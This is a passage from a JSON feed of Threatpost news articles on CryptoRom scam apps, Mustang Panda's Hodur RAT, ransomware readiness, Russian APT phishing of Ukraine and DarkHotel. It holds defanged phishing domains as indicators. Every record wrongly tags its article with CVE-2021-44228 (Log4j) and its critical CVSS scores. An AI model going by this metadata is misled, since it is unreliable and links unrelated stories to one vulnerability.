taxes on the total profits before they will unfreeze my account.\u201d\n\nKarl Steinkamp, director at Coalfire, told Threatpost that the scam is a perfect storm of social engineering.\n\n\u201cAn overarching theme here is twofold: One, we are seeing the world\u2019s population rapidly wanting to adopt some format of crypto assets, whether this is Bitcoin, Ethereum or any one of the other 17K+ altcoins,\u201d he said. \u201cAnd two, there is an increasing need for end user (and company) security awareness training when utilizing, storing and transferring any crypto asset. Crypto and digital-asset protection includes different technologies and skills needed to adequately secure the resources.\u201d\n\nHe added, \u201cThe mixing of dating, money / lending, and social-engineering efforts is and will continue to be a potent combination for bad actors to continue to steal money from victims. Bad actors only need to find one crack in the armor, while individuals and companies need to protect against every avenue of threats.\u201d\n\n## What\u2019s New This Time?\n\nA crucial component to the CryptoRom attack flow is those fake apps. Victims might receive a link to download what purports to be BTCBOX, for example, or Binance \u2013 perfectly legitimate cryptocurrency trading platforms. These apps appear to have professional user interfaces, and even come with customer-service chat options.\n\nApple and Google apply strict vetting to weed out malicious mobile apps like these from their official stores. But, as Threatpost has [covered before](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>), hackers have clever tricks to get around conventional security testing. In the past, for example, CryptoRom\u2019s preferred method was to use [the Apple Developer Program and Enterprise Signatures](<https://threatpost.com/cryptorom-scammers-apple-enterprise-features/175474/>).\n\nNow, CryptoRom is taking advantage of two new iOS features.\n\nThe first, TestFlight, is a feature developers can use to distribute beta versions of their apps to testers.\n\n\u201cUnfortunately,\u201d wrote the researchers, \u201cjust as we\u2019ve seen happen with other alternative app distribution schemes supported by Apple, \u2018TestFlight Signature\u2019 is available as a hosted service for alternative iOS app deployment, making it all too simple for malware authors to abuse.\u201d\n\nCryptoRom has shifted from Enterprise Signatures towards TestFlight Signatures because, wrote Sophos, \u201cit is a bit cheaper\u201d \u2013 requiring only an .IPA file with a compiled iOS app. Apps also look \u201cmore legitimate when distributed with the Apple Test Flight App,\u201d researchers added. \u201cThe review process is also believed to be less stringent than App Store review.\u201d\n\n\u201cHackers leveraging Apple\u2019s TestFlight platform as a distribution mechanism for malicious apps is a clever \u2014 and relatively simple \u2014 tactic that can certainly lead to problems for victims,\u201d Ray Kelly, fellow at NTT Application Security, told Threatpost. \u201cUsers should understand that side-loading applications is always a precarious proposition. Apps that are downloaded and installed outside of the of the App Store or Google Play ecosystem have not been vetted for security and privacy risks, leaving the door wide open for attackers to compromise users\u2019 personal data and sometimes, their financial accounts.\u201d\n\nEven more so than TestFlight, CryptoRom attackers have been using WebClips, a feature that allows web links to be added to the iOS home screen like regular apps. Malicious WebClips mimic real apps like RobinHood (in the following case, \u201cRobinHand\u201d).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png>)\n\nA malicious WebClip offering in the Apple App Store. Source: Sophos.\n\n\u201cIn addition to App Store pages, all these fake pages also had linked websites with similar templates to convince users,\u201d the researchers wrote. \u201cThis shows how cheap and easy it is to mimic popular brands while siphoning thousands of dollars from victims.\u201d\n\nSince it\u2019s almost impossible for law enforcement to crack down on any one individual scam, app store providers hav a responsibility to monitor for misuse of these developer tools, Mark Lambert, vice president of products at ArmorCode, told Threatpost. He added, \u201cUltimately, however, the problem is a lack of security awareness. It is essential that users look for things that \u2018don\u2019t look right\u2019 and have a fundamental view of not trusting electronic communications or taking them on face value.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T17:32:59", "type": "threatpost", "title": "\u2018CryptoRom\u2019 Crypto Scam is Back via Side-Loaded Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T17:32:59", "id": "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "href": "https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:33", "description": "The Chinese advanced persistent threat (APT) Mustang Panda (a.k.a. Temp.Hex, HoneyMyte, TA416 or RedDelta) has upgraded its espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) \u2013 largely in and around Southeast Asia.\n\nFor one thing, the APT has deployed a brand-new, customized variant of an old but powerful remote-access tool (RAT) called PlugX (aka Korplug), according to researchers from ESET. They named this latest variant \u201cHodur,\u201d after a blind [Norse god](<https://en.wikipedia.org/wiki/H%C3%B6%C3%B0r>) known for slaying his thought-to-be-invulnerable half-brother Baldr.\n\nBeyond that, Mustang Panda has developed a complex array of tactics, techniques and procedures (TTPs) to maximize the efficacy of its attacks.\n\nESET researchers noted, \u201cEvery stage of the deployment process utilizes anti-analysis techniques and control-flow obfuscation.\u201d\n\nThe cyberespionage campaign dates back to at least last August and is still ongoing, according to ESET, and is targeting mainly governments and NGOs. Most victims are located in East and Southeast Asia, but there are outliers in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan).\n\nThe attacks begin with social-engineering emails or watering-hole attacks, researchers said.\n\n\u201cThe compromise chain includes decoy documents that are frequently updated and relate to events in Europe [and the war in Ukraine],\u201d noted the team, in a [Wednesday posting](<https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/>). \u201cOne of the filenames related to this campaign is \u201cSituation at the EU borders with Ukraine.exe.\u201d\n\nOther phishing lures mention updated COVID-19 travel restrictions, an approved regional aid map for Greece, and a Regulation of the European Parliament and of the Council.\n\n\u201cThe final lure is a real document available on the European Council\u2019s website,\u201d according to ESET. \u201cThis shows that the APT group behind this campaign is following current affairs and is able to successfully and swiftly react to them.\u201d\n\n## What is Hodur?\n\nHodur derives [from PlugX](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/#:~:text=PlugX%20was%20first%20identified%20in,the%20infected%20system%3B%20and%20more.>), a RAT that \u201callows remote users to perform data theft or take control of the affected systems without permission or authorization. It can copy, move, rename, execute and delete files; log keystrokes; fingerprint the infected system; and more.\u201d\n\nPlugX is one of the oldest malware families around, having existed in some form or another since 2008, with a rise in popularity in the [mid-2010s](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>). Malware that old won\u2019t cut it these days, which is why Mustang Panda has constantly [iterated](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) on it. Even just a few weeks ago, researchers from Proofpoint [discovered](<https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european>) an upgrade \u201cchanging its encoding method and expanding its configuration capabilities.\u201d\n\nAccording to ESET, the new variant \u201cmostly lines up with other Korplug variants, with some additional commands and characteristics.\u201d It for instance closely resembles another Norse-themed variant \u2013 Thor \u2013 [discovered](<https://unit42.paloaltonetworks.com/thor-plugx-variant/>) in 2020.\n\n## Sophisticated Attack Chain\n\nHodur itself is hardly the star of the show: Mustang Panda\u2019s campaign features literally dozens of TTPs designed to establish persistence, collect data and evade defenses.\n\nAs mentioned, the campaign begins simply, as the group uses current events to phish their targets. For example, last month, Proofpoint discovered it puppeteering a NATO diplomat\u2019s email address to send out .ZIP and .EXE files titled \u201cSituation at the EU borders with Ukraine.\u201d\n\nIf a target falls for the bait, a legitimate, validly signed, executable vulnerable to DLL search-order hijacking, a malicious DLL, and an encrypted Hodur file are deployed on the target machine.\n\n\u201cThe executable is abused to load the module, which then decrypts and executes the\u2026RAT,\u201d explained researchers. \u201cIn some cases, a downloader is used first to deploy these files along with a decoy document.\u201d\n\nMustang Panda\u2019s campaigns then frequently use custom loaders for shared malware including Cobalt Strike, Poison Ivy, and now, Hodur. Then things get interesting. ESET analysts tallied a total of 44 MITRE ATT&CK techniques deployed in this campaign. Most interesting are the 13 different methods of obfuscating or otherwise evading cybersecurity tools and detection.\n\nFor example, the ESET blog noted that \u201cdirectories created during the installation process are set as hidden system directories,\u201d and \u201cfile and directory names match expected values for the legitimate app that is abused by the loader.\u201d\n\nAnd, the malware gaslights you because \u201cscheduled tasks created for persistence use legitimate-looking names,\u201d and \u201cwhen writing to a file, Korplug sets the file\u2019s timestamps to their previous values.\u201d\n\n## **Who\u2019s Behind Mustang Panda?**\n\nCybersecurity analysts have been tracking Mustang Panda [since 2017](<https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda>), when they first started using Mongolian-themed phishing tactics to conduct espionage on targets in Southeast Asia. Still, there\u2019s much we don\u2019t know about the group.\n\nThe depth and complexity of their TTPs puts Mustang Panda more in the company of state-sponsored groups than criminal ones. So \u201cit is possible, though unproven, that they are state-sponsored or at least state-sanctioned,\u201d wrote Mike Parkin, senior technical engineer at Vulcan Cyber, via email.\n\nHistorically, the group has kept to Southeast Asia, with one notable exception \u2013 [the Vatican](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) \u2013 in 2020. The vast majority of targets in ongoing campaigns have, indeed, been located in Mongolia and Vietnam, followed closely by Myanmar. However, as mentioned, the list also includes select entities in Europe and Africa, which muddies the picture a bit.\n\n\u201cThe target distribution is interesting,\u201d Parkin concluded. \u201cThere isn\u2019t enough information publicly available here to determine the attacker\u2019s ultimate agenda.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T14:08:06", "type": "threatpost", "title": "Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T14:08:06", "id": "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "href": "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n![specops logo](https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/16111526/Specops-Logo.png)\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T14:20:55", "description": "The baby upchucks. The dog loudly informs you that she\u2019s detected a budding squirrel armageddon. Your department\u2019s Zoom meeting starts in four minutes. The Bank of Fezziwig texts: If you haven\u2019t enabled online banking, click here.\n\nWhat. Do. You. DO?!?\n\nIt doesn\u2019t matter that you\u2019ve been working remotely since circa P.P. \u2013 that\u2019s Pre-Pandemic times. Now, your spouse is underfoot, your kids are bouncing off the walls of your quote-unquote office, you haven\u2019t had coffee, and you\u2019re pretty sure you don\u2019t even have an account at B of F, so you better just click that link and get the thing off your phone and out of your face.\n\n![specops logo](https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/16111526/Specops-Logo.png)\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nWrong answer! You\u2019ve been [smished](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>) by an attacker who sent a malicious link via SMS.\n\nTwo years into the pandemic, remote work has become common, but securing data is just as tough as it\u2019s always been. You don\u2019t have to look far to see tales of human error leading to cyber malfeasance: The human factor is at the base of most cyberattacks, from the employees who [fall for](<https://threatpost.com/bec-losses-top-18b/167148/>) business email compromise (BEC) attacks to whoever forgot to shut down that no-longer-used [VPN account](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>) that attackers used to launch the calamitous [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) ransomware attack.\n\nMark Loveless is a staff security researcher at GitLab, maker of the web-based Git repository. He\u2019s an expert at securing data when you\u2019ve got a remote, oftentimes frantically distracted workforce. After all, as GitLab [puts it](<https://about.gitlab.com/company/culture/all-remote/guide/>), it\u2019s \u201cone of the world\u2019s largest all-remote companies,\u201d with over 1,500 team members located in more than 65 countries around the world.\n\nMark visited the Threatpost podcast to give us an update on the world of remote work and to answer this question: Where are we now with data protection?\n\nCaution: If you\u2019re playing a drinking game based on how many times he\u2019ll say \u201c[Zero Trust](<https://threatpost.com/practical-guide-zero-trust-security/151912/>),\u201d stock the liquor cabinet before listening. Mark also cautioned that the dog might see a squirrel during our interview. It happens.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022522_Mark_Loveless_GitLab_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T14:00:53", "type": "threatpost", "title": "Securing Data With a Frenzied Remote Workforce\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T14:00:53", "id": "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "href": "https://threatpost.com/securing-data-frenzied-remote-workforce-podcast/178742/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there have been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 